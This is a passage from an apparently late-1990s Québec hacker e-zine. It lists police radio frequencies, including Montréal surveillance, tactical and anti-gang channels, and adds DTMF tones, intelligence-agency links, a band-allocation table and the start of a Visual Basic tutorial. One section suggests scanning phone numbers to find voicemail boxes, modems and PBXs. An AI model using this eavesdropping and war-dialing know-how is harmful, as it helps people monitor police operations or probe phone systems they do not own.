142.77000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP COMMON CHANNEL.
140.97000 (ONTARIO) 107.2 PROVINCE D'ONTARIO OPP SIMPLEX CHANNEL
153.80000 XJL 673 QUEBEC
153.83000 XJK 901 QUEBEC
154.10000 XJK 901 QUEBEC
154.10000 XJF 96 QUEBEC
154.19000 XJK 901 QUEBEC
154.71000 XJF 96 QUEBEC
154.71000 XJK 299 123.0 QUEBEC
154.77000 XJF 96 QUEBEC
154.77000 XJK 900 QUEBEC
155.40000 XJF 96 QUEBEC
155.40000 XJK 900 QUEBEC
155.85000 QUEBEC
155.88000 XJK 900 QUEBEC
155.88000 XJK 901 QUEBEC
158.80000 XJF 96 QUEBEC
154.19000 XJF 96 QUEBEC ANTI-EMEUTE SEULEMEMENT
155.13000 XJK 299 QUEBEC ANTI-EMEUTE SEULEMENT.
155.79000 QUEBEC BANDE 1.
155.79000 XJF 96 123.0 QUEBEC F-1 OPERATIONS GENERALES
155.85000 XJF 96 QUEBEC F-2.
155.58000 XJF 96 QUEBEC F-3.
411.16250 XJF 96 123.0 QUEBEC LIEN COMPLEXE G ? RX SUR PLACE OU INTERMOD ?
153.80000 XJK 902 QUEBEC (ILE D'ORLEANS)
153.98000 XJK 902 QUEBEC (ILE D'ORLEANS)
154.10000 XJK 902 QUEBEC (ILE D'ORLEANS)
154.19000 XJK 902 QUEBEC (ILE D'ORLEANS)
155.79000 XJK 902 123.0 QUEBEC (ILE D'ORLEANS)
155.85000 XJK 902 QUEBEC (ILE D'ORLEANS)
413.31250 XJF 588 151.4 REPENTIGNY
413.51250 XJF 588 151.4 REPENTIGNY
412.91250 XJF 588 151.4 REPENTIGNY ACI RX. AUSSI TIM A 0 CTCSS
412.66250 ? REPENTIGNY DATA, TERMINAUX MOBILES.
411.58750 ? 136.5 RICHELIEU
411.63750 XJF 576 123.0 RIGAUD
153.77000 XJF 321 RIMOUSKI
154.68000 XJF 321 RIMOUSKI
155.43000 XJF 321 RIMOUSKI
153.87500 ? RIMOUSKI DE INFO MEDAQ. FREQUENCE ETRANGE ?
159.33000 XJI 252 RIVIERE AU RENARD
153.95000 XJF 260 RIVIERE DU LOUP
411.52500 XJF 544 ROBERVAL
418.27500 XJF 544 ROBERVAL
159.21000 ? ROCHESTER NY INTERSERVICE
411.65000 XJI 278 ROCK FOREST
412.56250 XJI 278 ROCK FOREST
154.68000 XJH 222 ROCK ISLAND
412.78750 XJJ 34 127.3 ROSEMERE
154.04000 XJH 53 ROUYN-NORANDA F1-DATA BURSTS/TONE AIGU/DVP SUR DEMANDE
154.92000 XJH 53 ROUYN-NORANDA F2 - CRPQ
159.27000 XJF 361 SCHEFFERVILLE
154.10000 XJK 28 SEPT ILES
154.71000 XJK 28 SEPT ILES
158.97000 ? SHAWINIGAN
411.85000 ? 162.2 SHAWINIGAN SUD
413.10000 ? SHAWINIGAN SUD
411.85000 ? SHAWINIGAN SUD TIM
855.58750 XJF 44 TRK SHERBROOKE SIMPLEX.
856.03750 XJF 44 TRK SHERBROOKE SIMPLEX.
856.28750 XJF 44 TRK SHERBROOKE SIMPLEX.
856.53750 XJF 44 TRK SHERBROOKE SIMPLEX.
856.78750 XJF 44 TRK SHERBROOKE SIMPLEX.
855.56250 XJF 44 TRK SHERBROOKE SIMPLEX. SWAT
867.26250 XJF 44 TRK SHERBROOKE TRUNKING EDACS
866.26250 XJF 44 TRK SHERBROOKE TRUNKING EDACS.
866.23750 XJF 44 TRK SHERBROOKE TRUNKING EDACS.
866.48750 XJF 44 TRK SHERBROOKE TRUNKING EDACS.
866.53750 XJF 44 TRK SHERBROOKE TRUNKING EDACS.
866.76250 XJF 44 TRK SHERBROOKE TRUNKING EDACS.
866.78750 XJF 44 TRK SHERBROOKE TRUNKING EDACS.
867.03750 XJF 44 TRK SHERBROOKE TRUNKING EDACS.
867.06250 XJF 44 TRK SHERBROOKE TRUNKING EDACS.
867.28750 XJF 44 TRK SHERBROOKE TRUNKING EDACS.
866.73750 XJF 44 TRK SHERBROOKE TRUNKING EDACS. ALLOUE MAIS PAS EN SRV ?
155.97000 XJG 57 SILLERY VERIFIE INFO MEDAQ
411.93750 XJH 30 103.5 SOREL
413.43750 XJH 30 100.0 SOREL
154.17500 XJI 284 ST ADOLPHE D'HOWARD
154.20500 XJI 284 103.5 ST ADOLPHE D'HOWARD ENCODAGE SSI ET ACI RX (800 HZ)
411.58750 XJO 883 71.9 ST AMABLE POLICE DE STE JULIE
154.16000 XJG 461 100.0 ST AMBROISE DE KILDARE POSTE DE POLICE DE JOLIETTE
151.29500 XJF 771 100.0 ST ANTOINE DES LAURENTIDES
411.61250 XJF 945 100.0 ST BASILE LE GRAND CW ID RX.SSI
412.26250 XJK 937 114.8 ST BRUNO DE MONTARVILLE ENCODAGE SSI (VSB) PERMANENT
411.67500 XJJ 671 100.0 ST CESAIRE (VILLE)
154.16000 XJG 461 100.0 ST CHARLES BOROMEE POLICE JOLIETTE (450) 759-5222
154.92000 VBN 344* ST CHARLES BORROMEE VOIR 154.160 POLICE JOLIETTE
411.68750 XJL 635 123.0 ST CONSTANT
412.56250 XJG 425 156.7 ST CONSTANT CANDIAC, DELSON, ST CONSTANT
151.29500 XJF 895 127.3 ST DONAT (MONTCALM) REPETEUR AU MT GARCEAU.AVEC INCENDIES ?.
413.13750 XJG 494 123.0 ST EUSTACHE
413.56250 XJN 667 123.0 ST EUSTACHE
413.68750 XJN 667 123.0 ST EUSTACHE
411.93750 XJN 667 123.0 ST EUSTACHE ENCODAGE SSI PERMANENT
454.37500 [REF] 136.5 ST EUSTACHE TEMPORAIRE. SERVAIT LORS DE LA CRISE OKA
154.65000 XJI 83 ST FELICIEN
411.60000 XJF 291 114.8 ST GABRIEL (BERTHIER)
154.92000 XJF 877 ST GEORGES DE BEAUCE
158.97000 XJF 875 ST GEORGES OUEST
411.16250 XJF 264 123.0 ST HUBERT/LEMOYNE F1
412.78750 XJF 264 123.0 ST HUBERT/LEMOYNE F2 - CRPQ
413.13750 XJF 264 123.0 ST HUBERT/LEMOYNE
412.18750 XJF 73 100.0 ST HYACINTHE BASE = CONTROLE
411.98750 XJF 49 110.9 ST JEAN SUR RICHELIEU F2 - POLICE DU HAUT RICHELIEU
412.96250 XJF 49 110.9 ST JEAN SUR RICHELIEU F1
411.38750 XJF 37 118.8 ST JEROME
151.29500 XJF 37 100.0 ST JEROME A REVOIR
154.02500 XJF 293 ST JOVITE
411.38750 XJF 51 123.0 ST LAMBERT TIM (PAS DE CTCSS) +VOIX (AVEC CTCSS)
410.56250 XJA 260 114.8 ST LAZARE DANS TOUR D'UNITEL
412.66250 VOR 492 ST LAZARE DANS TOUR D'UNITEL
411.65000 VOR 492 114.8 ST LAZARE SECURITE POLICE (TOUR UNITEL)
158.97000 ? ST LUC DE CHAMPLAIN
410.86250 XJP 397 162.2 ST LUC SUR RICHELIEU
413.36250 ? ST MICHEL
154.16000 XJG 461 100.0 ST PAUL DE JOLIETTE POLICE JOLIETTE
154.16000 XJG 461 100.0 ST PIERRE DE JOLIETTE (VIL) POLICE JOLIETTE
410.11250 ? ST RAYMOND
411.71250 XJH 256 114.8 ST REMI DE NAPIERVILLE SSI
410.16250 XJF 721 91.5 ST SAUVEUR DES MONTS
159.21000 XJF 80 100.0 ST THIMOTHE AUTRE RPT A 151.265 (PARALLELE)
151.26500 ? 100.0 ST THIMOTHE NEW JUIL 99 EN // AVEC 159.210 RPT # 2
154.16000 XJG 461 100.0 ST THOMAS DE JOLIETTE POLICE JOLIETTE
413.92500 XJF 814 ST TITE
162.12000 ? 100.0 STE ADELE
159.21000 XJG 35 103.5 STE AGATHE DES MONTS
154.83000 CFD 693 100.0 STE ANNE DES LACS NOUVEAU JAN 1997. 3 MUNICIPALITES.ANI
411.88750 ? STE ANNE DES PLAINES
413.31250 XJF 556 114.8 STE CATHERINE
411.03750 XJF 556 114.8 STE CATHERINE ENCODAGE SSI
410.13750 XJG 91 162.2 STE FOY F-1 OPERATIONS (VERIFIE PAR INFO-MEDAQ). CHANGE EDACS 866 MHZ
411.11250 XJG 91* 162.2 STE FOY F-2 BROUILLEUR NON PERMANENT (INFO MEDAQ PASSE SUR EDACS 866 MHZ + AEGIS )
413.31250 XJG 91 162.2 STE FOY F-3 SIMPLEX - PASSE AU EDACS + AEGIS NUMÉRIQUE
866.11250 XJG 91 TRK STE FOY TRUNKING EDACS + ENCODAGE NUMÉRIQUE AEGIS PERM.
866.21250 XJG 91 TRK STE FOY TRUNKING EDACS + ENCODAGE NUMÉRIQUE AEGIS PERM.
867.41250 XJG 91 TRK STE FOY TRUNKING EDACS + ENCODAGE NUMÉRIQUE AEGIS PERM.
866.46250 XJG 91 TRK STE FOY TRUNKING EDACS + ENCODAGE NUMÉRIQUE AEGIS PERM.
866.66250 XJG 91 TRK STE FOY TRUNKING EDACS + ENCODAGE NUMÉRIQUE AEGIS PERM.
411.58750 XJO 883 71.9 STE JULIE DE VERCHERES
154.26500 XJG 432 STE MARIE DE BEAUCE
411.68750 XJF 506 STE MARTHE SUR LE LAC
154.16000 XJG 461 100.0 STE MELANIE POLICE JOLIETTE
411.63750 XJF 330* STE SOPHIE (TERREBONNE) 154.130.
154.13000 XJF 330 114.8 STE SOPHIE (TERREBONNE) SSI
412.88750 XJF 74 127.3 STE THERESE
156.03000 ? SUFFOLK COUNTY NY. CAR TO CAR.
411.65000 XJF 243 SUTTON
410.86250 VOR 472 141.3 TERREBONNE
411.48750 XJF 342 141.3 TERREBONNE
411.88750 XJF 570 141.3 TERREBONNE
419.12500 ? TERREBONNE LIENS VERS REPETEURS 412 MHZ
414.13750 ? TERREBONNE (REMOTE) LIENS VERS REPETEURS 412 MHZ.TX TOUJOURS ON.
412.97500 ? THETFORD MINES
154.92000 XJF 943 THURSO
142.33500 ? 127.3 TORONTO ? RECU EN INVERSIONS (DE TEMPÉRATURE)
411.71250 XJF 499 100.0 TRACY
411.93750 XJF 499 103.5 TRACY
413.01250 XJF 499 100.0 TRACY
151.29500 XJF 499 123.0 TRACY REPETEUR MOBILE VERS 411/416.7125
410.30000 XJF 410 TROIS RIVIERES
410.67500 XJG 29 77.0 TROIS RIVIERES RX SOUVENT EN INVERSIONS
411.62500 ? 82.5 TROIS RIVIERES OUEST
460.20000 KTB 231 118.8 TROY, VERMONT
460.15000 KTB 231 118.8 TROY, VERMONT ID RX VOCALEMENT. QTH A REVOIR
411.68750 XJF 767 VAL BELAIR
412.48750 XJF 767 VAL BELAIR
411.13750 ? VAL BELAIR ENCODAGE (?) PERMANENT.DE INFO-MEDAQ.
411.57500 ? VAL D'OR
151.29500 XJF 895 VAL DAVID ST DONAT
410.86250 ? 114.8 VALCOURT
159.21000 XJF 80 100.0 VALLEYFIELD AUTRE RPT A 151.265 (PARALLELE)
151.26500 ? 100.0 VALLEYFIELD NEW JUIL 99 EN // AVEC 159.210 RPT # 2
**412.01250**XJK 37*****156.7**VANIER PLUS EN FONCTION - COUVERT PAR QUÉBEC
**413.38750**XJK 37*****156.7**VANIER PLUS EN FONCTION - COUVERT PAR QUÉBEC
412.11250 XJG 47 123.0 VARENNES AUSSI TERMINAUX (0 PL).MAINTENANT ENCODE SSI.
411.65000 ? 103.5 VAUDREUIL
412.31250 XJF 826 107.2 VAUDREUIL
411.71250 XJF 826 107.2 VAUDREUIL-DORION
412.66250 ? 118.8 VICTORIAVILLE
164.10000 VAS 788* WASKAGANISH
411.62500 XJF 457 100.0 WATERLOO ENCODAGE SSI
411.57500 XJH 240 WINDSOR
460.03750 KSE 566 118.8 [?] [USA] REVOIR ID, PAS BON (QTH:TEXAS)
155.46000 XJG 429 141.3 [NON LOCALISE]
410.76250 ? 71.9 [NON LOCALISE]
411.38750 ? 114.8 [NON LOCALISE]
411.67500 ? 103.5 [NON LOCALISE]
411.71250 ? 110.9 [NON LOCALISE]
411.73750 ? 110.9 [NON LOCALISE]
412.21250 ? 141.3 [NON LOCALISE]
412.23750 ? 141.3 [NON LOCALISE]
412.26250 ? 123.0 [NON LOCALISE]
413.51250 ? 141.3 [NON LOCALISE]
411.98750 ? [NON LOCALISE] BURSTS DE DATA TERMINAUX MOBILES.
154.92000 ? 103.5 [NON LOCALISE] ENCODAGE SSI ET PP NR
155.62500 ? [NON LOCALISE] ENCODAGE SSI RPT OUT 0 PL
412.38750 ? 141.3 [NON LOCALISE] REVOIR CTCSS,PAS CERTAIN
413.46250 ? [NON LOCALISE] TIM - STE JULIE ?


NOTES : Lorsque je mentionne à quelques reprises 'Entendu ou RX en
inversions' cela indique que j'ai reçu cette station en inversions....de
température (lorsqu'un front froid rencontre un chaud ou vice-versa.
Cettecondition est favorable pour faire voyager les ondes VHF et UHF sur de
grandes distances et peut durer de quelques minutes à plusieurs heures.) et
ne s'applique pas au genre de modulation. SI un encodage de la voix est
utilisé, j'utilise plutôt la mention 'SSI' ou 'encodage SSI'....



****************************************************************************


Fréquences de la SQ
Voici une liste de fréquences connues utilisé par ce service.


Classification par fréquences

NOTE : Pour ce tableau, j'inclus quelques localisations à titre de référence
seulement, mais cela n'est pas complet car bien entendu ces fréquences sont
utilisées un peu partout au Québec...du moins pour les canaux 1 à 11.



RPT Mobiles Canal Notes et détails
N/A 171.075 C Mobiles à mobiles seulement (mobiles du G.I. seulement)
N/A 171.180 A Mobiles à mobiles seulement
N/A 172.020 B Mobiles à mobiles seulement
152.510 157.770 16
152.525 157.785 17
152.540 157.800 18
152.555 157.815 19
153.650 155.100 22 Poste autoroutier Montréal-Laval [M] (Montréal-Métro).
153.920 155.040 25
154.100 154.430 27
154.220 155.520 20
154.400
154.565
154.680 155.580 21 MRC Matawinie (Rawdon) [Q]
154.740 155.850 23 Poste autoroutier Montréal-Laval (Montréal-Métro)
154.800 155.400 26 MRC Des Pays D'en Haut
154.950 155.970 24
155.655
166.500 171.540 03
166.620 171.810 07 Était cartier général
166.635 171.795 12
166.650 171.780 10 Cartier / Champlain (ponts)
166.665 171.195 15
166.680 171.210 06
166.740 172.140 02
166.800 171.360 01 Poste principal MRC Matawinie (Rawdon)
166.815 171.495 13 MRC Montcalm [Q] (ex. poste Lachenaie)
166.830 172.080 08 Poste autoroutier des Laurentides [M] / MRC Des Pays D'en Haut [M]
/Anciennement : Cowansville/Granby [S], St Jérôme [H].
167.010 172.200 09 Poste principal MRC Matawinie
167.025 171.525 14 MRC de Lanaudière (Berthier et autoroutes)
167.040 171.930 05 Poste principal MRC Matwawinie
167.340 171.480 04 Anciennement : Valleyfield/Vaudreuil [K], autre [Q]
167.535
167.550
167.700 171.510 11
454.475 459.475 R1 Répéteur véhiculaire, basse puissance
454.550 459.550 R2 Répéteur véhiculaire, basse puissance
454.625 459.625 R3 Répéteur véhiculaire, basse puissance


Fréquence de la SQ
Classification par CANAUX

Répéteur Mobiles Canal

166.800 171.360 01
166.740 172.140 02
166.500 171.540 03
167.340 171.480 04
167.040 171.930 05
166.680 171.210 06
166.620 171.810 07
166.830 172.080 08
167.010 172.200 09
166.650 171.780 10
167.700 171.510 11
166.635 171.795 12
166.815 171.495 13
167.025 171.525 14
166.665 171.195 15
152.510 157.770 16
152.525 157.785 17
152.540 157.800 18
152.555 157.815 19
154.220 155.520 20
154.680 155.580 21
153.650 155.100 22
154.740 155.850 23
154.950 155.970 24
153.920 155.040 25
154.800 155.400 26
154.100 154.430 27
171.075 171.075 28 / C
N/A 171.180 A
N/A 172.020 B
N/A 171.075 C
454.475 459.475 R1
454.550 459.550 R2
454.625 459.625 R3

*****************************************************************************

Fréquences radio du SPCUM
A noter que les canaux sont répertoriés et numérotés en 6 banques :

1 - Canaux d'usage général
2 - Sections spécialisées
3 - Groupe technique
4 - Surveillance
D - Données (les canaux de data)
R - Canaux de réserve

1-01 = 410.1125
1-02 = 410.2625 (auxiliaire)
1-03 = 410.3625
1-04 = 410.4875
1-05 = 410.6125
1-06 = 410.7875 (auxiliaire)
1-07 = 410.9125
1-08 = 410.6625 (utilisée en simplex pour les suivis de personnes)
1-09 = 412.6875 (opérations spéciales)
1-10 = 411.3125 (opérations spéciales)
1-11 = 412.1375 (opérations spéciales)
1-12 = 410.0125 (opérations spéciales - lien téléphonique)

2-01 = 408.3125 Simplex - section d'intervention régionale (OUEST)
2-02 = 408.6375 " " " " " + hélico.(CENTRE SUD/EST)
2-03 = 408.4125 Simplex - section d'intervention régionale (NORD/EST)
2-04 = 408.2125 Simplex - Moralité
2-05 = 408.5125 Simplex - Vols qualifiés
2-06 = 408.4375 Simplex - Fraudes et incendies criminels
2-07 = 408.5375 Simplex - Anti gang
2-08 = 408.1125 Simplex - Stupéfiants

A noter que ces canaux, de la banque 2, sont généralement encryptés en mode
numérique. ..et qu'il est impossible de les décoder. Si votre radio s'arrête
sur l'une de ces fréquences et que vous entendez que du bruit blanc (comme
si le squelch etait ouvert) c'est qu'il s'agit d'une transmission encodée
numériquement.


3-01 = 413.6625 (Groupe technique/tactique)
3-02 = 413.6125 (Groupe technique)

Ces fréquences sont aussi encodées numériquement la plupart du temps.

4-01 = 411.1875 Centre opérationnel (Brouillé,répéteur n'est pas utilisé présentement)
4-02 = 418.2125 Surveillance physique (Brouillé, simplex)
4-03 = 411.5375 Groupe tactique (sert rarement)
4-04 = 418.7375 Surveillance physique (Brouillé, simplex)
4-05 = 418.7875 Surveillance physique (Brouillé, simplex)
4-06 = 418.1875 Surveillance physique (Brouillé, simplex)
4-07 = 418.2375 Surveillance physique (Brouillé, simplex)

De nouveau, la plupart de ces fréquences sont encodées numériquement.

D-1 = 410.0375
D-2 = 410.3375
D-3 = 410.8125
D-4 = 411.2125

Transmission de données pour les terminaux mobiles. Le standard n'est pas
connu de même qu'il est impossible a décoder...

Réserve

R-01 = 418.8625
R-02 = 410.5875
R-03 = 413.7375
R-04 = 413.7625 (véhicules volés)
R-05 = 418.1125
R-06 = 413.7875
R-07 = 413.2375

Divers :
Centre des mesures d'urgences de la CUM

411.2375

Plusieurs intervenants participent à ce service, dont la ville de Montréal
et les municipalités environnantes, ainsi que d'autre intervenants dont
Urgences Santé, la Sûreté du Québec, la STCUM, la police des ports
nationaux,etc,etc.


Une vérification du système radio se fait tout les mardis matin.

****************************************************************************



Fréquences des tonalités de signalisation DTMF

( DTMF - Dual Tone Multi Frequencies )

TOUCHE F1 (Hz) F2 (Hz)
1 1209 697
2 1336 697
3 1477 697
4 1209 770
5 1336 770
6 1477 770
7 1209 852
8 1336 852
9 1477 852
0 1336 941
* 1209 941
# 1477 941
A 1633 697
B 1633 770
C 1633 852
D 1633 941
DIAL TONE 350 440
BUSY SIGNAL 480 620
RINGING SIGNAL 440 480

****************************************************************************


-- A venir? --

- Plan pour filtre interférence/intermodulation
- Plan de modification de tone
- Encore du stock de police et agence secrète :)
- Satellite
- D'Autre sorte d'antenne
- D'Autre ondes, juste pour vous...
- Interresting Web Site
- Découverte!
- Trucs Divers
- Vos question...?
- Et plus...

Greeting to: "Neuro" Pour l'article qu'il a trouver de VE2VGA
et "VE2VGA" ...pour tout ce que j'ai pu trouver sur
son site et mes Aussi mes livre: Haruteq Scanner Book
Édition Québec et L'annuaires de fréquence de la région
de Québec! Oh et la revue Net-Mag avec leur fréquence secrète
qui viennent de VE2VGA que je n'aurais pu connaître sans eu :)


-- Conclu! --
Bon alors vous avez du voir que mon article est environ le quart de ce que
Neuro a trouver mais ca dérange pas l'intention etais la hehe! Non sans joke
la prochaine fois je vais vous donnez un ou deux plan assurer car je crois
que l'article etais assez gros et que de toute façon j'ai pas eu le temps de
faire le .jpg du plan alors cela est remis a la prochaine fois. Alors
j'espère que vous avez aimer et que vous allez m'envoyer vos questions et
vos découverte pour les prochains mag...




-====================-
-= Services Secrets =-
-====================-
Bon ca y est les services secret sur Internet... Mouais ceci est tirer de la
revue "Net-Mag" que j'avais perdu ouais! Bon eu y dise que c'est pas aussi
secret que ca les services secret mais tk je commencerai pas a trop dire
mais opinion malgré que vous devez comprendre que c'est pas dans le plus top
secret ce qui est le plus secret n'est pas vraiment connecter au net malgré
qu'un français ou un belge je sais pu a trouver une liste de militaire et
entk le gros kit sur un site mais finalement on en sais trop rien! Va
falloir vérifier!

-- Les services secrets anglais --

http://www.mi5.gov.uk
Il existe au moins deux sites sur les Services Secrets anglais. L'un est le
site officiel de MI5 (Services de Sécurité). La plupart des documents sont
au format PDF et nécessitent Acrobat Reader, d'Adobe. Il est très facile de
contacterdirectement par téléphone au: (0)171 930 9000 l'indicatif est le:
(011 44) si vous avez des informations sur des terroristes, par exemple.
L'autre site (non officiel) concerne le MI6:
http://www.five.org.uk/security/mi6org/mi6org.htm
Le MI6 est le "Secret Intelligence Service" Anglais (les espions) dont le
directeur actuel est: David Spedding depuis septembre 1994.

-- Les services secrets US --
http://www.treas.gov/usss
Le site officiel des Services Secrets des États-Unis (en anglais) donne
beaucoup d'informations. Allez voir la galerie de photos. On y apprend
comment détecter la fausse monnaie, grâce a de nombreuse photos détaillées
des billets vert ... Alors avec ca vous allez pouvoir savoir quoi ne pas
faire si vous faite de la fausse monnaie des US.
http://www.treas.gov/usss/money_detect.htm
On y trouve aussi des offres d'emploi (pour citoyens américains "filiales"
dans chaque état et a l'étranger, l'histoire des services secrets et leur
directeur actuel: Brain L Stafford
http://www.treas.gov/usss/director.htm . Voir aussi le site de la CIA
Central Intelligence Agency dirigée par George J. Tenet: http://www.cia.gov
et celui NSA: http://www.nsa.gov:8080


-- Les services secrets israéliens --
http://www.chez.com/boigien/secret/israel/mossad/mossad.htm (site non
officiel bien sur) On distingue l'Aman: Agaf Ha-Modi'in pour les renseignent
militaire: le Lekem Lishkat Késhér Madaï qui est le bureau des relations
scientifiques: le MossadHa-Mossad Lé-Mofiin ou lé Tafkidim Méyouh'adim c'est
l'institut de renseignement et des opération spéciales (les espions) et dont
le patron actuel est le Général Danny Yatom remplaçant Shabtaï Shavit; le
Shin Beth: Shérout Ha-Bitah'on Ha-Klali qui est le service de la sécurité
générale.


-- Les services secrets français --
La aussi, il en existe plusieur: ceux qui dépendent secrétariat général de
la défense nationale comme la BRGE, Brigade de Renseignement et de Guerre
Électronique ; la DGSE Direction Générale de la Sécurité Extérieur (les
espions) ex-SDECE, dont le directeur actuel est Jacques Dewatre ; la DPSD,
Direction de la Protection et de la Sécurité de la Défense; la DRM,
Direction du Renseignement Militaire et le SCSSI, Service Central de la
Sécurité des Systèmes d'Information. Et ceux qui dépendent du ministère de
l'intérieur: la DST Direction de la Surveillance du Territoire et les RG,
Direction centrale Renseignement Generaux.Et ici le site non officiel de la
DGSE.
http://dsge.citeweb.net/principale.shtml
Il y a des résumes de quelques opérations(Rainbox warrior, "remplacement" de
Bokassa par Dacko et quelque autres sabotages), les principaux sites: la
"piscine" (caserne Mortier) "tristus-city",etc...

-- Les services secrets canadiens --
http://www.csis-scrs.gc.ca
Beaucoup de communication dans ce site du Service canadien du renseignement
de sécurité (SCIS). On y trouve les adresses de leurs bureaux. Le directeur
actuel du SCIS est Ward Elcock.
Vous pouvez lire son communiquer:
http://www.csis-scrs.gc.ca/fra/press/kellyf.html .
A voir aussi la GRC: http://www.spots.ab.ca/~fivestar/grc2.htm et pour la
liste des fréquences secretes veiller vous referez a l'article de Scanner
D'ondes.


Bon alors peut-être que certain cherchais certaine de ces adresses entk vous
pourrez y faire ce que vous y voulez avec sans trop de connerie bien sur
comme on le sais tous :)

Et je crois bien qu'il doit y avoir de bonne information dans quelques un de
ces sites ou sinon en scannant un peu on devrais trouver mieux et en plus il
y a des sites qui donnent les numéro de téléphone alors on peut très bien
trouver des VMB, Modem, PaBX ,etc... alors chercher un peu et si j'ai le
temps ma essayer de faire ca pour vous un moment
donner!

Alors pas trop de connerie

PaToFF(Pat-EtHiQ)


**********************************************************************
8-1 QUELQUES FREQUENCES D'ECOUTES (+ ou - légales) by Cyberdollar
**********************************************************************

26,065 à 26,505 MHz CB (bande "A")
26,313 à 26,475 MHz téléphones sans fil agréés
26,515 à 26,955 MHz CB (bande "B")
26,965 à 27.405 MHz CB (bande "C", seule autorisée en France)
27,415 à 27,855 MHz CB (bande "D")
27,865 à 27,985 MHz CB (bande "E")
28,000 à 29,700 MHz trafic amateur (bande des "10 mètres")
29,700 à 30,525 MHz usage militaire
30.525 à 32.125 MHz réseaux privés
32.125 à 32.500 MHz usage militaire
33.000 à 34.850 MHz usage militaire
34.850 à 36.200 MHz réseaux privés
35.400 à 39.200 MHZ microphone "sans fil"
36.200 0 39.000 MHz usage militaire
37.500 à 38.250 MHz radio-astronomie
39.400 à 40.600 MHz réseaux privés
40.600 à 41.000 MHz usage militaire
41.000 à 41.200 MHz radiocommande
41.255 MHz télécommande
41.312 à 41.475 MHz téléphones sans fils agréés
41.500 à 50.200 MHz usage militaire et téléphone sans fil non agréés
50.200 à 51.200 MHz trafic amateur
51.200 à 60.000 MHz usage militaire
55.750 à 63.750 MHz télévision (bande I)
60.000 à 68.000 MHz réseaux privés
68.000 à 68.460 MHz usage militaire
68.462 à 69.250 MHz réseaux privés, douanes
69.250 à 70.250 MHz usage militaire
70.250 à 70.525 MHz réseaux militaire
70.525 à 70.975 MHz usage militaire
70.975 à 71.950 MHz réseaux privés
71.950 à 72.500 MHz usage militaire, EDF
72.512 à 73.300 MHz réseaux privés, douanes
73.300 à 74.800 MHz Gendarmerie Nationale
74.800 à 75.200 MHz radiolocalisation aéronautique
75.300 à 77.475 MHz réseaux privés, taxis
77.475 à 80.000 MHz Gendarmerie Nationale
80.000 à 82.475 MHz réseaux privés, taxis
82.475 à 83.000 MHz usage militaire
83.000 à 87.300 MHz police, pompiers, SAMU
87.340 à 87.415 MHz système Eurosignal
87.500 à 108.000 MHz radiodiffusion FM (bande II)
108.800 à 112.00 MHz balisage aéronautique (ILS)
108..000 à 118.000 MHz usage militaire
111.600 à 177.900 MHz balise aéronautique (VOR)
118.000 à 136.000 MHz trafic aéronautique (bande "air" ou "aviation")
136.000 à 138.000 MHz satellites
138.000 à 144.000 MHz usage militaire
143.9875 à 144.000 MHz fréquence réservée "vol libre"
144.000 à,146.000 MHz trafic amateur (bande des "2 mètres")
146.000 à 156.000 MHz trafic aéronautique
151.000 à 151.425 MHz réseaux "R 150"
151.425 à 152.380 MHZ réseaux privés
152.880 à 152.975 MHz réseaux "R 150"
152.975 à 156.025 MHz trafic maritime et fluvial (bande "VHF marine")
156.025 à 157.425 MHz trafic maritime et fluvial (bande "VHF marine")
157.425 à 157.575 MHz réseaux privés
157.575 à 160.200 MHz réseaux "R 150"
160.200 à 160.625 MHz réseaux privés
160.625 à 160.950 MHz trafic maritime et fluvial (bande "VHF marine")
160.975 à 161.475 MHz réseaux privés
161.550 à 162.025 MHz trafic maritime et fluvial (bande "VHF marine")
162.500 à 162.525 MHz trafic maritime et fluvial (bande "VHF marine")
165.200 à 168.900 MHz téléphone de voiture Radiocom 2000
169.800 à 173.500 MHz téléphone de voiture Radiocom 2000
176.500 à 183.500 MHz téléphone de voiture Radiocom 2000
184.500 à 189.100 MHz téléphone de voiture Radiocom 2000
192.500 à 197.100 MHz téléphone de voiture Radiocom 2000
197.700 à 199.500 MHz téléphone de voiture Radiocom 2000
200.500 à 207.500 MHz téléphone de voiture Radiocom 2000
208.500 à 215.500 MHz téléphone de voiture Radiocom 2000
216.500 à 223.500 MHz téléphone de voiture Radiocom 2000
225.000 à 400.000 MHz trafic aéronautique et usage militaire
406.100 à 410.000 MHz réseaux privés
414.500 à 418.000 MHz téléphone de voiture Radiocom 2000
418.000 à 420.000 MHz réseaux privés
424.500 à 428.000 MHz téléphone de voiture Radiocom 2000
430.000 à 440.000 MHz trafic amateur (bande "432")
440.000 à 444.600 MHz téléphone de voiture ligne SFR
444.600 à 447.000 MHz réseaux privés
450.000 à 454.600 MHz téléphone de voiture ligne SFR
454.600 à 456.000 MHz police, pompiers, SAMU
456.000 à 457.675 MHz réseaux privés
457.675 à 458.225 MHz SNCF
463.000 à 464.000 MHz réseaux privés
464.000 à 466.000 MHz police, pompiers, SAMU
466.000 à 467.675 MHz réseaux privés
467.675 à 468.225 MHz SNCF
468.325 à 470.000 MHz réseaux privés
470.000 à 606.000 MHz télévision (bande IV)
614.000 à 880.000 MHz télévision (bande V)
884.000 à 890.000 MHz téléphone sans cordons
890.000 à 915.000 MHz téléphone de voiture GSM
929.000 à 935.000 MHz téléphone sans cordon
935.000 à 960.000 MHz téléphone de voiture GSM
960.000 à 1215.000 MHz aéronautique: IFF, TACAN, DME
1240.000 à 1300.000 MHz trafic amateur


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 9-Vb5 Tutorial..
|( ) Phreak ( ) Hack (X) Autres
'._______Par Vip0|a ____________________ ______ vipola@pyrofreak.org ___


Bon alors, cet arcticle est le premier d'une suite portant sur Microsoft
Visual Basic version 5.0. Ne vous attendez pas a avoir des sources miracle
pour créé un tetris ou un IRC client. Mais, pour ce premier numéro, plutôt
une introduction du logiciel et de son Fonctionnement en général. Bien
entendu, cette suite d'arcticle s'adresse au débutant, mais qui sait,
peut-être n'en savez-vous pas autant que vous le croyez,

Le Basic:
Le basic est le langage utilisé en Visual Basic, on pense
tout de suite au Basic lorsqu'on entend "Q-Basic", un
logiciel de programmation en DOS qui ressemble
particulièrement à "edit.com"

Microsoft a repris Qbasic et en a fait une version
plus visual donc plus "frendly" en utilisant le mode
de Programmation par Object.

VB5?
La Raison pour laquelle j'ai opté pour la version 5 de
Visual Basic, c'est parceque la majorité des personnes
utilisent Vb5 ou savent où se le procuré.

Description de l'interface
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Barre de Menu:

Elle Comprend tout les Commandes disponible de Visual
Basic. Ce n'est pas la plus rapide, mais on fini tjr
par y trouver ce que l'on cherche.

Barre de Bouton:

